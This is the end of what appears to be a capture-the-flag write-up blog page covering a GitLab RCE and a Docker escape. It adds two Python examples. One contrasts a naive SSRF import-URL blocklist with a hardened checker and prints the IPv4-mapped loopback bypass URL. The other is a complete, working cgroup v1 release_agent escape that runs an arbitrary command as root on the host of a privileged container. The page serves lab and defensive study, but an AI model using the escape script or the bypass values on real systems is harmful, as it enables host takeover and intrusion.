href="https://www.youtube.com/watch?v=LrLJuyAdoAg">https://www.youtube.com/watch?v=LrLJuyAdoAg</a></span></span></li><li id="https://www.notion.so/e4233176e5954f948b54a76841ded6b1" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/dotPY-hax/gitlab_RCE/blob/main/gitlab_rce.py">https://github.com/dotPY-hax/gitlab_RCE/blob/main/gitlab_rce.py</a></span></span></li><li id="https://www.notion.so/b116475105aa4e44949c20c0c80155c7" class="NumberedList" 
value="4"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1">https://medium.com/better-programming/escaping-docker-privileged-containers-a7ae7d17f5a1</a></span></span></li><li id="https://www.notion.so/22c243b00a8a4def942230f171e0b040" class="NumberedList" value="5"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/escaping-from-a-docker-container#sys_admin-capability-and-apparmor-disabled">https://book.hacktricks.xyz/linux-unix/privilege-escalation/escaping-from-a-docker-container#sys_admin-capability-and-apparmor-disabled</a></span></span></li><li id="https://www.notion.so/1dda8f1214d14d048d92e1b4358963a1" class="NumberedList" value="6"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html">https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html</a></span></span></li></ol><div id="https://www.notion.so/ddfb7ff4f7ba43f2832163999152e5f1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"></span></p></div></article>
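<p>The import-URL blocklist bypass from the Exploitation section, as an added example in Python that is not part of the original writeup and is not GitLab's own filtering code. The naive checker only models the class of check (string comparison against known loopback spellings) that the IPv4-mapped address slips past; the hardened one parses the host as an address and goes a little beyond the page's single case by also unwrapping the deprecated IPv4-compatible and 6to4 embeddings. The URLs in the demo are constructed for this example.</p>

```python
"""Added example (not code from the writeup or from GitLab): why an import-URL
blocklist is bypassed by https://[0:0:0:0:0:ffff:127.0.0.1], and what a
correct check looks like.  Both checkers below are written for this page.
"""
import ipaddress
from urllib.parse import urlsplit

# Textual blocklist: the class of check the bypass defeats.  The kernel happily
# connects "::ffff:127.0.0.1" to 127.0.0.1, but no string here matches it.
NAIVE_BLOCKLIST = {"localhost", "127.0.0.1", "::1", "0.0.0.0"}


def naive_is_blocked(url: str) -> bool:
    """Vulnerable form: compare the host string against a fixed list."""
    host = urlsplit(url).hostname or ""   # hostname strips [] and lowercases
    return host in NAIVE_BLOCKLIST


def _embedded_ipv4(addr: ipaddress.IPv6Address):
    """Return the IPv4 address an IPv6 literal embeds, or None.

    Beyond the page's single address: besides the IPv4-mapped form
    (::ffff:a.b.c.d) this unwraps the deprecated IPv4-compatible form
    (::a.b.c.d) and 6to4 (2002:XXXX:XXXX::), all of which can smuggle an
    internal IPv4 address past a check that only looks at the IPv6 string.
    """
    if addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    if addr.sixtofour is not None:
        return addr.sixtofour
    if addr in ipaddress.IPv6Network("::/96") and int(addr) > 1:  # skip :: and ::1
        return ipaddress.IPv4Address(int(addr))
    return None


def hardened_is_blocked(url: str) -> bool:
    """Hardened form: parse the host as an address, unwrap embedded IPv4 and
    allow only globally routable unicast.

    Non-literal hostnames are rejected here because this offline example does
    not resolve DNS.  A real implementation must resolve the name, apply the
    same test to every returned address, and then connect to that exact
    address rather than re-resolving, or DNS rebinding reopens the hole.
    """
    host = urlsplit(url).hostname
    if not host or host == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True                       # not an IP literal: see docstring
    if isinstance(addr, ipaddress.IPv6Address):
        inner = _embedded_ipv4(addr)
        if inner is not None:
            addr = inner                  # ::ffff:127.0.0.1 -> 127.0.0.1
    return not addr.is_global             # loopback, RFC 1918, link-local, ...


def compare(urls):
    """Run both checkers over import URLs; returns {url: (naive, hardened)}."""
    return {u: (naive_is_blocked(u), hardened_is_blocked(u)) for u in urls}


if __name__ == "__main__":
    # Constructed sample inputs: the page's bypass URL plus a few variants.
    for url, (naive, hard) in compare([
        "http://127.0.0.1/",
        "https://[0:0:0:0:0:ffff:127.0.0.1]/",
        "http://[::ffff:7f00:1]/",
        "http://[::127.0.0.1]/",
        "http://8.8.8.8/repo.git",
    ]).items():
        print(f"{url:40} naive_blocked={naive!s:5} hardened_blocked={hard}")
```

<p>Running the module prints the page's bypass URL as not blocked by the naive check and blocked by the hardened one. The design point is that a blocklist must be applied to the address the socket will actually connect to, after every normalisation the resolver and the network stack perform, never to the string the user typed.</p>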
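<p>The cgroup v1 release_agent escape from the Privilege Escalation section, wrapped into one script as an added example in Python. It is not the writeup's own commands and not a tool from the linked resources. It assumes what held on the box: we are already root inside a privileged Docker container whose root filesystem is an overlay mount (so /etc/mtab carries an <code>upperdir=</code> option), the host kernel still offers a mountable cgroup v1 controller (<code>rdma</code>, as on the page), and the host kernel can exec a file placed in that upperdir. The names <code>/cmd</code>, <code>/output</code> and the child cgroup <code>x</code> are kept from the writeup; the mount point <code>/tmp/cgrp</code> and the sample mtab text are this example's own.</p>

```python
"""Added example, not the writeup's own commands: the cgroup v1 release_agent
escape as functions, with the preconditions checked before anything is mounted.
"""
import os
import subprocess
import time
from pathlib import Path
from typing import List, Optional

MTAB = "/etc/mtab"

# Constructed sample of what /etc/mtab looks like inside a Docker container
# (the real file has more lines); used for the offline demo in __main__.
SAMPLE_MTAB = (
    "overlay / overlay rw,relatime,"
    "lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,"
    "upperdir=/var/lib/docker/overlay2/abc123/diff,"
    "workdir=/var/lib/docker/overlay2/abc123/work 0 0\n"
    "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0\n"
)


def host_upperdir(mtab_text: str) -> Optional[str]:
    """Host-side path of the container's writable overlay layer.

    Does the job of the page's sed one-liner, but only looks at the overlay
    mounted on "/" so another overlay mount in the container cannot mislead it.
    """
    for line in mtab_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[1] != "/" or fields[2] != "overlay":
            continue
        for opt in fields[3].split(","):
            if opt.startswith("upperdir="):
                return opt[len("upperdir="):]
    return None


def build_payload(host_path: str, command: str) -> str:
    """The script the host kernel will exec as root.  Its output is written
    under host_path, which is where it becomes visible inside the container."""
    return f"#!/bin/sh\n{command} > {host_path}/output 2>&1\n"


def check_preconditions(mtab_text: str, cgroup_root: str = "/sys/fs/cgroup") -> List[str]:
    """Reasons the escape cannot work; an empty list means it looks viable."""
    problems = []
    if os.geteuid() != 0:
        problems.append("not root inside the container")
    if host_upperdir(mtab_text) is None:
        problems.append("no overlay mount of / with upperdir= in mtab")
    if os.path.exists(os.path.join(cgroup_root, "cgroup.controllers")):
        problems.append("cgroup v2 unified hierarchy: no release_agent to abuse")
    return problems


def escape(command: str, workdir: str = "/tmp/cgrp", controller: str = "rdma") -> str:
    """Run `command` as root on the host; return its output read back from /output."""
    mtab_text = Path(MTAB).read_text()
    problems = check_preconditions(mtab_text)
    if problems:
        raise RuntimeError("; ".join(problems))
    host_path = host_upperdir(mtab_text)

    os.makedirs(workdir, exist_ok=True)
    # mount(2) needs CAP_SYS_ADMIN in the initial user namespace (and no
    # AppArmor/seccomp rule forbidding it): this step only works because the
    # container is privileged.
    subprocess.run(["mount", "-t", "cgroup", "-o", controller, "cgroup", workdir], check=True)
    child = os.path.join(workdir, "x")
    os.makedirs(child, exist_ok=True)
    Path(child, "notify_on_release").write_text("1")
    # release_agent exists only at the hierarchy root, and the kernel resolves
    # the path it contains on the host, hence the upperdir prefix.
    Path(workdir, "release_agent").write_text(f"{host_path}/cmd")

    Path("/cmd").write_text(build_payload(host_path, command))
    os.chmod("/cmd", 0o755)
    if os.path.exists("/output"):
        os.remove("/output")

    # Put a throwaway shell into x and let it exit: x is then empty, so the
    # kernel runs release_agent on the host as root.  $$ is expanded by the
    # inner sh, exactly as in the page's sh -c "echo \$\$ > ..." step.
    subprocess.run(["sh", "-c", f"echo $$ > {child}/cgroup.procs"], check=True)
    for _ in range(50):                   # the agent runs asynchronously
        if os.path.exists("/output"):
            return Path("/output").read_text()
        time.sleep(0.1)
    raise RuntimeError("release_agent never ran: wrong controller, or not a privileged container?")


if __name__ == "__main__":
    print("upperdir in sample mtab:", host_upperdir(SAMPLE_MTAB))
    print(escape("cat /root/root.txt"), end="")
```

<p>Inside the container, <code>python3 escape.py</code> reproduces the page's steps and prints the host's root flag; outside a privileged container, <code>check_preconditions</code> stops it before anything is mounted. Restricting <code>host_upperdir</code> to the overlay on <code>/</code> is the one deliberate change from the sed one-liner, which takes the first <code>upperdir=</code> anywhere in mtab.</p>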
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>